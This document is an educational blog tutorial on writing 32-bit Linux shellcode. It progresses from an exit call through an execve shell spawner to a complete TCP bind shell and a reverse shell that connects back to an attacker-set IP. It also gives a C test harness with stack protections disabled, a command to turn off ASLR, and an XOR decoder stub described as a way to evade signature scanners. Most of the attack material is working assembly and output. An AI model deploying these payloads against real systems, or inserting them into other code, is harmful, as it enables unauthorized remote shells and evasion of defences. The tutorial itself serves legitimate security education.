Writing a Shell Code for Linux
Thilan Dissanayaka Exploit development Apr 21, 2020

Writing a Shell Code for Linux

When you exploit a buffer overflow, you overwrite the return address to hijack the program's execution flow. But redirect it to what? You need code to execute — and that code needs to be small, self-contained, and capable of running anywhere in memory without depending on external libraries or fixed addresses.

That code is shellcode.

In this post, we'll write Linux shellcode from scratch for 32-bit x86 systems. But more importantly, we'll explain why every single line is written the way it is. Why assembly? Why XOR instead of MOV? Why //bin/sh with two slashes? Why does a CALL instruction help us find our string? Every technique has a reason, and understanding those reasons is what separates someone who copies shellcode from someone who can write their own.

Note: This tutorial is for educational purposes — understanding shellcode is essential for both exploit developers and the defenders building protections against them. Always ensure you have proper authorization before testing on any systems.

Prerequisites

Before diving in, you should have a basic understanding of:

  • x86 assembly language (registers, stack operations, basic instructions)
  • How the stack works (push, pop, ESP, return addresses)
  • Linux system calls
  • Using a terminal and debugging tools

Environment Setup

# Install the tools we'll need
sudo apt-get update
sudo apt-get install nasm gcc gdb strace

# Disable ASLR for consistent testing
# (ASLR randomizes memory addresses, making debugging harder)
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

Why Assembly?

Shellcode is written in assembly because it needs to be raw machine code — no compiler, no linker, no runtime, no libc. When you inject shellcode into a vulnerable program's memory, there's no loader to resolve function addresses, no dynamic linker to load shared libraries, and no operating system setup to initialize the environment.

You write assembly, assemble it into machine code, and that sequence of bytes runs directly on the CPU. Nothing in between.

High-level languages like C compile into machine code too, but they produce code that depends on:

  • The C runtime (startup code, _start, __libc_start_main)
  • Shared libraries (libc for printf, system, etc.)
  • Fixed memory addresses for global variables
  • A properly initialized stack and heap

None of those exist in an exploit scenario. So we go as low as we can — assembly.

How Linux System Calls Work (32-bit)

Everything useful that shellcode does — writing to the screen, spawning a shell, opening a network connection — goes through system calls. Syscalls are the interface between user-space programs and the Linux kernel.

On 32-bit Linux, the calling convention is:

Register Purpose
EAX System call number
EBX First argument
ECX Second argument
EDX Third argument
ESI Fourth argument
EDI Fifth argument
EBP Sixth argument

After loading the registers, you trigger the syscall with int 0x80 — a software interrupt that transfers control to the kernel.

The syscalls we'll use:

Syscall Number Signature
exit 1 exit(int status)
write 4 write(int fd, char *buf, int len)
execve 11 execve(char *filename, char **argv, char **envp)
dup2 63 dup2(int oldfd, int newfd)
socketcall 102 socketcall(int call, unsigned long *args)

You can find the full list in /usr/include/asm/unistd_32.h on your Linux system.

Chapter 1: The Simplest Shellcode — exit(0)

Let's start with the absolute simplest shellcode possible: a clean exit.

section .text
global _start

_start:
    mov eax, 1      ; syscall number 1 = exit
    mov ebx, 0      ; exit status 0 = success
    int 0x80         ; trigger the syscall

Assemble, link, and run:

$ nasm -f elf32 exit.asm -o exit.o
$ ld -m elf_i386 exit.o -o exit
$ ./exit
$ echo $?
0

It works. But there's a problem — let's look at the machine code:

$ objdump -d exit -M intel

08048060 <_start>:
 8048060:   b8 01 00 00 00    mov    eax,0x1
 8048065:   bb 00 00 00 00    mov    ebx,0x0
 804806a:   cd 80             int    0x80

See all those 00 bytes? Those are null bytes, and they're the first enemy of shellcode.

The Null Byte Problem

This is one of the most important concepts in shellcode development, so let's understand it thoroughly.

Most buffer overflow vulnerabilities involve string functionsstrcpy(), strcat(), gets(), sprintf(). These functions process data until they encounter a null byte (0x00), which signals the end of the string.

If your shellcode contains a null byte at position 10, the string function stops copying at position 10. Everything after that gets truncated. Your shellcode arrives incomplete, and it won't work.

So every null byte in our shellcode must be eliminated.

Let's fix our exit shellcode:

section .text
global _start

_start:
    xor eax, eax     ; EAX = 0 (no null bytes!)
    mov al, 1         ; AL = 1 (only sets the lowest byte of EAX)
    xor ebx, ebx     ; EBX = 0 (exit status)
    int 0x80

Let's examine why each change matters:

xor eax, eax instead of mov eax, 0

mov eax, 0 assembles to b8 00 00 00 00 — four null bytes. xor eax, eax assembles to 31 c0 — XOR-ing a register with itself always produces zero, and the instruction contains no null bytes. This is the standard way to zero a register in shellcode.

mov al, 1 instead of mov eax, 1

mov eax, 1 assembles to b8 01 00 00 00 — three null bytes, because EAX is a 32-bit register and the value 1 needs to be zero-padded to 32 bits. But mov al, 1 assembles to b0 01 — only 2 bytes, no nulls. AL is the lowest 8 bits of EAX, and since we already zeroed EAX with XOR, setting AL to 1 makes EAX = 1 without any null bytes.

Let's verify:

$ objdump -d exit -M intel

08048060 <_start>:
 8048060:   31 c0             xor    eax,eax
 8048062:   b0 01             mov    al,0x1
 8048064:   31 db             xor    ebx,ebx
 8048066:   cd 80             int    0x80

No null bytes. Six bytes total. Clean.

Here's a quick reference of null-byte-free alternatives:

Need Bad (has nulls) Good (null-free)
Set register to 0 mov eax, 0 xor eax, eax
Set register to small value mov eax, 5 xor eax, eax then mov al, 5
Set register to 1 mov eax, 1 xor eax, eax then inc eax
Push 0 to stack push 0 xor eax, eax then push eax

Chapter 2: Hello World Shellcode

Now let's write something that produces visible output — printing "Hello World!" using the write syscall.

The Naive Version

section .text
global _start

_start:
    ; write(1, "Hello World!\n", 13)
    mov eax, 4          ; syscall 4 = write
    mov ebx, 1          ; file descriptor 1 = stdout
    mov ecx, msg        ; pointer to the message
    mov edx, 13         ; message length
    int 0x80

    ; exit(0)
    mov eax, 1
    mov ebx, 0
    int 0x80

section .data
    msg db 'Hello World!', 0xa    ; 0xa = newline

This works as a standalone program, but it cannot work as shellcode. Why?

The msg label is in the .data section, and mov ecx, msg gets assembled as mov ecx, 0x080490a4 — a hardcoded memory address. When this shellcode runs inside an exploited program, that address points to something completely different (or invalid). The shellcode crashes.

This is the position-independence problem.

Position-Independent Code — The JMP-CALL-POP Trick

Shellcode doesn't know where in memory it will land. It might be injected into a stack buffer at 0xbffff000 one time and 0xbfffe800 the next (especially with ASLR). So it cannot use any hardcoded addresses.

But we still need to reference data — our "Hello World!" string has to live somewhere, and we need its address. How do we get the address of something when we don't know where we are in memory?

The answer is the JMP-CALL-POP technique, and it's one of the most elegant tricks in shellcode development.

Here's how it works:

  1. JMP forward to a CALL instruction at the end of the shellcode
  2. The CALL instruction jumps back to the shellcode's main body
  3. CALL has a critical side effect: it pushes the return address onto the stack — and the return address is the address of the instruction right after the CALL
  4. We place our string data right after the CALL instruction
  5. A POP instruction retrieves that address from the stack
         ┌──────── JMP to call_shellcode ───────────┐
         │                                           │
         ▼                                           │
    shellcode:                                       │
         POP ECX  ◄── ECX now has address of msg     │
         ...code...                                  │
         ...code...                                  │
                                                     │
    call_shellcode:                      ◄───────────┘
         CALL shellcode  ──► pushes address of next byte onto stack
         db 'Hello World!', 0xa    ◄── this address gets pushed!

When CALL shellcode executes, the CPU pushes the address of the next byte (the start of "Hello World!") onto the stack, then jumps to the shellcode label. The first instruction there is POP ECX, which grabs that address. Now ECX points to our string, regardless of where in memory the shellcode was loaded.

The Position-Independent Version

section .text
global _start

_start:
    jmp short call_shellcode      ; Step 1: jump to the CALL

shellcode:
    pop ecx                       ; Step 3: ECX = address of "Hello World!\n"

    ; write(1, ecx, 13)
    xor eax, eax
    mov al, 4                     ; syscall 4 = write
    xor ebx, ebx
    mov bl, 1                     ; fd 1 = stdout
    xor edx, edx
    mov dl, 13                    ; length = 13
    int 0x80

    ; exit(0)
    xor eax, eax
    mov al, 1                     ; syscall 1 = exit
    xor ebx, ebx                 ; status = 0
    int 0x80

call_shellcode:
    call shellcode                ; Step 2: pushes address of msg, jumps back
    db 'Hello World!', 0xa       ; Our string data — right after the CALL

Notice:

  • Every register is zeroed with XOR before use (no null bytes)
  • Values are set using AL, BL, DL (8-bit registers) instead of full 32-bit MOV
  • The string is not in a .data section — it's embedded directly in the .text section, right after the CALL instruction
  • No hardcoded addresses anywhere

Extracting and Testing the Shellcode

# Assemble and link
$ nasm -f elf32 hello.asm -o hello.o
$ ld -m elf_i386 hello.o -o hello

# Test as standalone
$ ./hello
Hello World!

# Extract the raw bytes
$ objdump -d hello | grep -Po '\s\K[a-f0-9]{2}(?=\s)' | sed 's/^/\\x/' | tr -d '\n'

Now we need a way to test these bytes as actual injected shellcode. We write a C test harness — a program that treats the shellcode bytes as executable code:

#include <stdio.h>
#include <string.h>

// The shellcode bytes extracted from objdump
unsigned char shellcode[] =
"\xeb\x16"                 // jmp short call_shellcode
"\x59"                     // pop ecx
"\x31\xc0"                 // xor eax, eax
"\xb0\x04"                 // mov al, 4
"\x31\xdb"                 // xor ebx, ebx
"\xb3\x01"                 // mov bl, 1
"\x31\xd2"                 // xor edx, edx
"\xb2\x0d"                 // mov dl, 13
"\xcd\x80"                 // int 0x80
"\x31\xc0"                 // xor eax, eax
"\xb0\x01"                 // mov al, 1
"\x31\xdb"                 // xor ebx, ebx
"\xcd\x80"                 // int 0x80
"\xe8\xe5\xff\xff\xff"     // call shellcode
"Hello World!\x0a";        // the string data

int main() {
    printf("Shellcode length: %lu\n", strlen((char *)shellcode));

    // Cast the shellcode array to a function pointer and call it
    int (*ret)() = (int(*)())shellcode;
    ret();

    return 0;
}
# Compile with protections disabled
$ gcc -fno-stack-protector -z execstack -m32 test.c -o test

# Run
$ ./test
Shellcode length: 38
Hello World!

Why the special GCC flags?

  • -fno-stack-protector — Disables stack canaries (which would detect our buffer overflow in a real exploit)
  • -z execstack — Makes the stack executable (modern systems mark the stack as non-executable by default, which prevents shellcode from running)
  • -m32 — Compiles for 32-bit (since our shellcode is 32-bit)

Chapter 3: Spawning a Shell — execve("/bin/sh")

This is the shellcode that gives "shellcode" its name — code that spawns a shell. The goal is to call:

execve("/bin/sh", ["/bin/sh", NULL], NULL)

This replaces the current process with /bin/sh, giving the attacker an interactive shell. Let's understand the execve syscall first.

Understanding execve

int execve(const char *filename, char *const argv[], char *const envp[]);
  • filename (EBX) — Pointer to a null-terminated string: "/bin/sh\0"
  • argv (ECX) — Pointer to an array of argument strings, terminated by NULL: ["/bin/sh", NULL]
  • envp (EDX) — Pointer to environment variables array, terminated by NULL. We'll use NULL

So we need to construct, entirely on the stack:

  1. The string "/bin/sh" followed by a null byte
  2. An array containing a pointer to that string, followed by a NULL pointer
  3. The appropriate register values

The Stack Layout

Here's what we need in memory:

                    Low Address
                    ┌─────────────────────┐
            ESP ──► │ ptr to "/bin//sh"   │ ◄── argv[0]
                    ├─────────────────────┤
                    │ NULL (0x00000000)   │ ◄── argv[1] (terminates argv)
                    ├─────────────────────┤
            EBX ──► │ "//bi" (0x69622f2f) │ ◄── start of string
                    ├─────────────────────┤
                    │ "n/sh" (0x68732f6e) │
                    ├─────────────────────┤
                    │ NULL (0x00000000)   │ ◄── string terminator
                    └─────────────────────┘
                    High Address

Wait — why "//bin/sh" with two slashes instead of "/bin/sh"?

Why "//bin/sh" Instead of "/bin/sh"

"/bin/sh" is 7 characters plus a null terminator = 8 bytes. But we push data onto the stack in 4-byte (32-bit) chunks. 8 bytes = 2 pushes, and we need a separate push for the null terminator. That's 3 pushes for 8 bytes — wasteful.

"//bin/sh" is 8 characters plus a null terminator = 9 bytes. But Linux treats multiple consecutive slashes as a single slash — //bin/sh is identical to /bin/sh. Now we have exactly 8 characters, which fits perfectly into 2 PUSH instructions (4 bytes each). We push the null terminator separately, but we've saved ourselves from having to pad or align anything.

"//bin/sh" in memory (little-endian):
PUSH 0x68732f6e  →  "n/sh"  (pushed first, ends up at higher address)
PUSH 0x69622f2f  →  "//bi"  (pushed second, ends up at lower address)

Reading from low to high: "//bi" + "n/sh" = "//bin/sh" ✓

Remember — the stack grows downward, but strings are read forward (low to high). So we push the end of the string first.

The Assembly

section .text
global _start

_start:
    ; === Step 1: Clear all registers ===
    ; We don't know what's in these registers when our shellcode runs.
    ; Starting with known zero values is critical.
    xor eax, eax
    xor ebx, ebx
    xor ecx, ecx
    xor edx, edx

    ; === Step 2: Push the string "/bin//sh\0" onto the stack ===

    push eax            ; Push 0x00000000 — this is the null terminator
                        ; for our string. We can't embed \x00 in the
                        ; shellcode bytes, but pushing a zeroed register
                        ; puts null bytes on the STACK, which is fine.

    push 0x68732f6e     ; Push "n/sh" (little-endian)
    push 0x69622f2f     ; Push "//bi" (little-endian)

    ; Now ESP points to "//bin/sh\0" on the stack
    mov ebx, esp        ; EBX = pointer to filename "/bin//sh"

    ; === Step 3: Build the argv array ===
    ; argv must be: [pointer_to_string, NULL]
    ; This is also built on the stack

    push eax            ; Push NULL — this terminates the argv array
    push ebx            ; Push pointer to "//bin/sh" — this is argv[0]

    ; Now ESP points to the argv array: [ptr, NULL]
    mov ecx, esp        ; ECX = pointer to argv array

    ; === Step 4: Set EDX (envp) ===
    ; EDX is already 0 (NULL) from the XOR above — no environment variables
    ; mov edx, eax      ; (already zero, but shown for clarity)

    ; === Step 5: Make the syscall ===
    mov al, 11          ; syscall 11 = execve
                        ; We use AL (not EAX) to avoid null bytes
    int 0x80            ; Transfer control to the kernel
                        ; If execve succeeds, this process is replaced
                        ; by /bin/sh — we never return here

Let's trace through the stack state at each step:

After "xor" instructions:
    EAX=0, EBX=0, ECX=0, EDX=0

After "push eax":
    Stack: [0x00000000]
    ESP ──►  ^

After "push 0x68732f6e":
    Stack: [0x68732f6e] [0x00000000]
    ESP ──►  ^

After "push 0x69622f2f":
    Stack: [0x69622f2f] [0x68732f6e] [0x00000000]
    ESP ──►  ^
    Reading as string from ESP: "//bin/sh\0" ✓

After "mov ebx, esp":
    EBX ──► "//bin/sh\0"

After "push eax" (NULL for argv terminator):
    Stack: [0x00000000] [0x69622f2f] [0x68732f6e] [0x00000000]
    ESP ──►  ^

After "push ebx" (pointer to string):
    Stack: [ptr_to_str] [0x00000000] [0x69622f2f] [0x68732f6e] [0x00000000]
    ESP ──►  ^

After "mov ecx, esp":
    ECX ──► [ptr_to_str, NULL]   (this is argv)
    EBX ──► "//bin/sh\0"         (this is filename)
    EDX = 0                      (this is envp = NULL)
    EAX = 11                     (syscall number)

    execve("/bin/sh", ["/bin/sh", NULL], NULL)  ✓

Compile and Test

$ nasm -f elf32 shell.asm -o shell.o
$ ld -m elf_i386 shell.o -o shell
$ ./shell
$ whoami
user
$ exit

You get a shell. The shellcode is about 25 bytes — small enough to fit in most buffer overflow exploits.

Check for Null Bytes

$ objdump -d shell -M intel

08048060 <_start>:
 8048060:   31 c0       xor    eax,eax
 8048062:   31 db       xor    ebx,ebx
 8048064:   31 c9       xor    ecx,ecx
 8048066:   31 d2       xor    edx,edx
 8048068:   50          push   eax
 8048069:   68 6e 2f 73 68  push   0x68732f6e
 804806e:   68 2f 2f 62 69  push   0x69622f2f
 8048073:   89 e3       mov    ebx,esp
 8048075:   50          push   eax
 8048076:   53          push   ebx
 8048077:   89 e1       mov    ecx,esp
 8048079:   b0 0b       mov    al,0xb
 804807b:   cd 80       int    0x80

No 00 bytes anywhere. Every byte is non-null. This shellcode can safely pass through strcpy(), gets(), and any other string function.

Chapter 4: TCP Bind Shell

A bind shell is shellcode that opens a port on the target machine and waits for the attacker to connect. When someone connects, they get a shell. This is useful when the target is directly reachable from the attacker's network.

The C equivalent of what we're building:

int sockfd = socket(AF_INET, SOCK_STREAM, 0);

struct sockaddr_in addr;
addr.sin_family = AF_INET;
addr.sin_port = htons(4444);
addr.sin_addr.s_addr = INADDR_ANY;
bind(sockfd, (struct sockaddr *)&addr, sizeof(addr));

listen(sockfd, 0);

int clientfd = accept(sockfd, NULL, NULL);

// Redirect stdin/stdout/stderr to the socket
dup2(clientfd, 0);  // stdin
dup2(clientfd, 1);  // stdout
dup2(clientfd, 2);  // stderr

execve("/bin/sh", ["/bin/sh", NULL], NULL);

That's 5 operations: socket, bind, listen, accept, dup2 (×3), then execve. In 32-bit Linux, all socket operations go through a single syscall — socketcall (number 102). The first argument (EBX) specifies which socket operation, and the second argument (ECX) is a pointer to the operation's arguments on the stack.

EBX Value Operation
1 SYS_SOCKET
2 SYS_BIND
4 SYS_LISTEN
5 SYS_ACCEPT
3 SYS_CONNECT

The Assembly — With Explanations

section .text
global _start

_start:
    ; ============================================
    ; socket(AF_INET, SOCK_STREAM, 0)
    ; ============================================
    ; Creates a TCP socket. Returns a file descriptor in EAX.
    xor eax, eax
    xor ebx, ebx
    xor ecx, ecx
    xor edx, edx

    mov al, 102         ; syscall 102 = socketcall
    mov bl, 1           ; SYS_SOCKET

    ; Build the argument array on the stack (pushed in reverse order)
    push edx            ; protocol = 0 (kernel picks TCP for SOCK_STREAM)
    push 1              ; SOCK_STREAM (TCP)
    push 2              ; AF_INET (IPv4)
    mov ecx, esp        ; ECX = pointer to arguments
    int 0x80            ; Returns socket fd in EAX

    mov esi, eax        ; Save the socket fd in ESI (we'll need it later)

    ; ============================================
    ; bind(sockfd, {AF_INET, 4444, 0.0.0.0}, 16)
    ; ============================================
    ; Binds the socket to port 4444 on all interfaces.
    ; We need to build a sockaddr_in struct on the stack.
    xor eax, eax
    mov al, 102         ; socketcall
    mov bl, 2           ; SYS_BIND

    ; Build sockaddr_in struct on the stack
    push edx            ; sin_addr = 0.0.0.0 (INADDR_ANY — listen on all interfaces)
    push word 0x5c11    ; sin_port = 4444 in network byte order (big-endian)
                        ; 4444 decimal = 0x115C → big-endian = 0x5C11
    push word 2         ; sin_family = AF_INET
    mov ecx, esp        ; ECX points to our sockaddr_in struct

    ; Build the argument array for bind()
    push 16             ; addrlen = sizeof(sockaddr_in) = 16
    push ecx            ; pointer to sockaddr_in struct
    push esi            ; socket fd
    mov ecx, esp        ; ECX = pointer to arguments
    int 0x80

    ; ============================================
    ; listen(sockfd, 0)
    ; ============================================
    ; Marks the socket as a passive socket that accepts connections.
    ; Backlog of 0 means only one pending connection at a time.
    xor eax, eax
    mov al, 102         ; socketcall
    mov bl, 4           ; SYS_LISTEN
    push edx            ; backlog = 0
    push esi            ; socket fd
    mov ecx, esp
    int 0x80

    ; ============================================
    ; accept(sockfd, NULL, NULL)
    ; ============================================
    ; Waits for an incoming connection. Blocks until someone connects.
    ; Returns a NEW file descriptor for the connected client.
    xor eax, eax
    mov al, 102         ; socketcall
    mov bl, 5           ; SYS_ACCEPT
    push edx            ; addrlen = NULL (we don't care who connected)
    push edx            ; addr = NULL
    push esi            ; socket fd
    mov ecx, esp
    int 0x80

    mov ebx, eax        ; Save client fd in EBX (needed for dup2)

    ; ============================================
    ; dup2(clientfd, 0/1/2) — redirect I/O to the socket
    ; ============================================
    ; This is the critical step. We redirect stdin (0), stdout (1),
    ; and stderr (2) to the client socket. After this, anything the
    ; shell reads comes from the network, and anything it writes
    ; goes back over the network.
    ;
    ; Without this step, the shell would read from the target's
    ; terminal and write to the target's terminal — useless to us.
    xor ecx, ecx        ; ECX = 0 (start with stdin)
dup_loop:
    xor eax, eax
    mov al, 63           ; syscall 63 = dup2
    int 0x80             ; dup2(clientfd, ecx)
    inc ecx              ; next fd (0 → 1 → 2)
    cmp cl, 3            ; done all three?
    jne dup_loop         ; if not, loop

    ; ============================================
    ; execve("/bin//sh", ["/bin//sh", NULL], NULL)
    ; ============================================
    ; Same technique as Chapter 3 — push string on stack, set up argv.
    xor eax, eax
    push eax             ; null terminator for string
    push 0x68732f6e      ; "n/sh"
    push 0x69622f2f      ; "//bi"
    mov ebx, esp         ; EBX = pointer to "//bin/sh"

    push eax             ; argv terminator (NULL)
    push ebx             ; argv[0] = pointer to "//bin/sh"
    mov ecx, esp         ; ECX = pointer to argv
    mov edx, eax         ; EDX = NULL (no environment variables)

    mov al, 11           ; syscall 11 = execve
    int 0x80

Test It

# Compile
$ nasm -f elf32 bind_shell.asm -o bind_shell.o
$ ld -m elf_i386 bind_shell.o -o bind_shell

# Terminal 1 — run the bind shell
$ ./bind_shell

# Terminal 2 — connect to it
$ nc localhost 4444
whoami
user
id
uid=1000(user) gid=1000(user) groups=1000(user)

You now have a remote shell over the network.

Chapter 5: TCP Reverse Shell

A bind shell waits for connections on the target. But what if the target is behind a firewall that blocks incoming connections? The answer is a reverse shell — the target connects back to the attacker.

The difference from the bind shell is just two operations:

Bind Shell Reverse Shell
socket() socket()
bind() connect()
listen()
accept()
dup2() ×3 dup2() ×3
execve() execve()

Instead of bind + listen + accept, we use a single connect() to reach the attacker's machine. Much simpler.

section .text
global _start

_start:
    ; ============================================
    ; socket(AF_INET, SOCK_STREAM, 0)
    ; ============================================
    xor eax, eax
    xor ebx, ebx
    xor ecx, ecx
    xor edx, edx

    mov al, 102         ; socketcall
    mov bl, 1           ; SYS_SOCKET
    push edx            ; protocol = 0
    push 1              ; SOCK_STREAM
    push 2              ; AF_INET
    mov ecx, esp
    int 0x80

    mov esi, eax        ; save socket fd

    ; ============================================
    ; connect(sockfd, {AF_INET, 4444, 127.0.0.1}, 16)
    ; ============================================
    ; Connect back to the attacker's machine.
    ; Change the IP address to your attacker machine's IP.
    xor eax, eax
    mov al, 102         ; socketcall
    mov bl, 3           ; SYS_CONNECT

    ; Build sockaddr_in on the stack
    push 0x0100007f     ; sin_addr = 127.0.0.1 in network byte order
                        ; 127 = 0x7f, 0 = 0x00, 0 = 0x00, 1 = 0x01
                        ; Stored as: 0x0100007f (little-endian representation
                        ; of the big-endian IP)
                        ;
                        ; WARNING: This contains null bytes (0x00)!
                        ; For a real exploit, you'd need a different IP
                        ; like 10.10.10.1 (0x010a0a0a) that has no nulls.

    push word 0x5c11    ; sin_port = 4444
    push word 2         ; sin_family = AF_INET
    mov ecx, esp

    push 16             ; addrlen
    push ecx            ; sockaddr struct
    push esi            ; socket fd
    mov ecx, esp
    int 0x80

    ; ============================================
    ; dup2(sockfd, 0/1/2)
    ; ============================================
    mov ebx, esi        ; socket fd (the CONNECTED socket, not a client fd)
    xor ecx, ecx
dup_loop:
    xor eax, eax
    mov al, 63
    int 0x80
    inc ecx
    cmp cl, 3
    jne dup_loop

    ; ============================================
    ; execve("//bin/sh", ["//bin/sh", NULL], NULL)
    ; ============================================
    xor eax, eax
    push eax
    push 0x68732f6e
    push 0x69622f2f
    mov ebx, esp

    push eax
    push ebx
    mov ecx, esp
    mov edx, eax

    mov al, 11
    int 0x80

Test It

# Terminal 1 — attacker listens for the callback
$ nc -lvp 4444
Listening on 0.0.0.0 4444

# Terminal 2 — run the reverse shell (on the "target")
$ ./reverse_shell

# Back in Terminal 1 — a shell appears
Connection received on 127.0.0.1 54321
whoami
user

About the null bytes in the IP address: 127.0.0.1 contains null bytes (0x00). In a real exploit, you'd use an attacker IP that doesn't contain null bytes (like 10.10.10.1 = 0x010a0a0a), or encode the shellcode to avoid the issue.

Shellcode Optimization Techniques

Size Matters

Smaller shellcode = more likely to fit in the available buffer. Every byte counts. Some tricks:

; Instead of two instructions to zero and set:
xor eax, eax     ; 2 bytes
mov al, 11        ; 2 bytes (total: 4 bytes)

; Sometimes you can use:
push 11           ; 2 bytes
pop eax           ; 1 byte  (total: 3 bytes)

; CDQ: if EAX is positive, sets EDX to 0
; (sign-extends EAX into EDX:EAX)
xor eax, eax      ; 2 bytes
cdq                ; 1 byte — EDX is now 0 too (saves "xor edx, edx")

; MUL: multiplying by zero zeroes both EAX and EDX
xor ecx, ecx      ; 2 bytes
mul ecx            ; 2 bytes — EAX=0, EDX=0 (zeroed two registers with one trick)

Polymorphic Shellcode

Advanced shellcode can encode itself to evade signature-based detection. A small decoder stub at the beginning decodes the rest of the shellcode at runtime:

decoder:
    jmp short get_shellcode
decode:
    pop esi                  ; ESI = address of encoded shellcode
    xor ecx, ecx
    mov cl, SHELLCODE_LEN   ; length of encoded shellcode
decode_loop:
    xor byte [esi], 0xAA    ; XOR each byte with key 0xAA
    inc esi
    loop decode_loop
    jmp short encoded_shellcode

get_shellcode:
    call decode
encoded_shellcode:
    ; ... XOR-encoded bytes here ...

The encoded shellcode looks nothing like the original, so signature scanners won't recognize it. At runtime, the decoder XORs each byte with the key to reveal the real shellcode, then jumps to it.

Testing and Debugging

Using GDB

GDB is essential for stepping through shellcode instruction by instruction:

$ gdb ./test
(gdb) set disassembly-flavor intel
(gdb) break *&shellcode         # Break at the start of our shellcode array
(gdb) run
(gdb) x/20i $eip               # Disassemble next 20 instructions
(gdb) info registers            # Show all register values
(gdb) si                        # Step one instruction
(gdb) x/16xb $esp              # Examine 16 bytes at the stack pointer

Using strace

strace shows you every syscall the shellcode makes — invaluable for verifying it's doing what you expect:

$ strace ./test
execve("./test", ["./test"], 0x7fff...) = 0
...
write(1, "Hello World!\n", 13)          = 13
exit(0)                                 = ?

Checking for Null Bytes

# Show any instructions containing null bytes
$ objdump -d shell | grep '00'

If you see 00 in the hex dump of any instruction, that instruction needs to be rewritten.

Final Thoughts

Writing shellcode teaches you things that no other exercise can. You learn how the CPU actually executes instructions, how the stack really works, how system calls bridge user space and kernel space, and how strings and data structures look in raw memory. Every byte matters. Every instruction has consequences.

The progression we followed — exit → hello world → shell spawn → bind shell → reverse shell — mirrors how real exploit payloads are built. You start with something simple, verify it works, then add complexity one layer at a time. And at every step, the constraints (no null bytes, position-independent, small size) force you to think creatively about how to achieve your goal within tight limits.

If you want to go deeper, try these challenges:

  • Write a reverse shell that avoids all bad characters, not just null bytes (some exploits filter \x0a, \x0d, \xff, etc.)
  • Write a staged shellcode — a tiny first stage that downloads and executes a larger second stage
  • Port these examples to 64-bit (x86_64 uses syscall instead of int 0x80, and the register convention is different)
  • Write shellcode for a different architecture — ARM or MIPS

Happy hacking.

ALSO READ
Error based SQL Injection
Feb 15 Application Security

In the previous example, we saw how a classic SQL Injection Login Bypass works. SQL Injection is not all about that. The real fun is we can extract the data from the database. In this tutorial, we...

SQL Injection Login Bypass
Feb 10 Application Security

SQL Injection (SQLi) is one of the oldest and most fundamental web application vulnerabilities. While modern frameworks have made it harder to introduce, understanding SQL injection is essential for anyone learning web security. In this post, we'll break it down from the ground up using a classic login bypass.

Out of Band SQL Injection
Feb 14 Application Security

Out of Band SQL Injection (OOB SQLi) is an advanced SQL injection technique where the attacker cannot retrieve data directly through the same communication channel used to send the injection payload....

Identity and Access Management (IAM)
May 11 Identity & Access Management

Who are you — and what are you allowed to do? That's the fundamental question every secure system must answer. And it's exactly what Identity and Access Management (IAM) is built to solve.

Singleton Pattern explained simply
Jan 27 Software Architecture

Ever needed just one instance of a class in your application? Maybe a logger, a database connection, or a configuration manager? This is where the Singleton Pattern comes in — one of the simplest but...

How I built a web based CPU Simulator
May 07 Pet Projects

As someone passionate about computer engineering, reverse engineering, and system internals, I've always been fascinated by what happens "under the hood" of a computer. This curiosity led me to...